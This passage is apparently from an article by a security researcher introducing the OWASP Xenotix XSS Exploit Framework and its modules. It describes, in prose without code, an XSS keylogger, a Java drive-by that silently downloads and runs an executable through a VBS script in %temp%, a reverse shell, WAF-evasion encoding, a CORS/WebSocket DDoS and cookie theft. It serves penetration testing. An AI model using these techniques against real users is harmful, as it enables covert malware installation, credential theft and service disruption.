The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework

XSS Keylogger

The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.  PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file.

[VIDEO] https://www.youtube.com/watch?v=owfF9C_Xerw [/VIDEO]

 

XSS Executable Drive-by Downloader

 

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim. 

[VIDEO] https://www.youtube.com/watch?v=i8c3kf4t6A8[/VIDEO]

XSS Payload Encoder

The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell

A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by. 

 

The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port.  

 

[VIDEO] https://www.youtube.com/watch?v=IT-8IH3yRrA [/VIDEO]

XSS DDoSer

With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.  WebSocket is a technology that allow web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.

 

[VIDEO] https://www.youtube.com/watch?v=cgLGgVWvi9Y [/VIDEO]

XSS Cookie Thief

 

It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.

 

Features for the Next Build

Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.

Conclusion

XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.J

About Ajin Abraham

Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.